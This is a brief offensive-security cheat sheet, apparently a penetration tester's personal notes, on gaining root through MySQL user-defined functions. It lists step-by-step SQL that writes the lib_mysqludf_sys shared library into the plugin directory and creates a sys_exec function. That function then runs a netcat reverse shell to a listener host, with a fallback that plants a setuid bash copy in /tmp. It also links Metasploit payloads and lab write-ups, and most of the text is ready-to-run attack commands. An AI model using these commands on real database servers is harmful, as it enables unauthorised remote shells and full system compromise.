MySQL User Defined Function

If we find root credentials to an internal mysql server it is game over.

Once we log in, we need to locate plugin paths and see if the secure file priv is null so that we can load data into the database.

show variables like '%plugin%';

Take note of the plugin directory.

show variables like '%secure_file_priv%';

Make sure that this one is null, otherwise this shit is not vulnerable because we won't be able to load data.

Now literally just follow this.

# Local method
use mysql;
create table tranilment(line blob);
insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from tranilment into dumpfile '/<plugin_dir>/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc <listener_ip> 1234 -e /bin/bash');

You should get a reverse shell. If by any reason there is a firewall blocking you from outbound connections ok not an issue.

Try this:

 select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Here are some articles to help you out:

Privilege Escalation with MySQL User Defined FunctionsMedium

MichMich

metasploit-framework/data/exploits/mysql at master · rapid7/metasploit-frameworkGitHub

This is the exploit download based on arch

Sometimes it'll give you an error because there is an issue doing the dumpfile process.

Community/Talk/Forums/About the project/Questions : LordOfTheRoot SQL Error [Root Me : plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information]

This is to troubleshoot it, just literally copy .so file into the plugin directory manually via the command line.

MySQL Error “file too short” when creating sys_exec function - eMarcel.comeMarcel.com - The Spirit of Discovery

Examples:

https://lyethar.gitbook.io/banzai/priv-escalation Banzai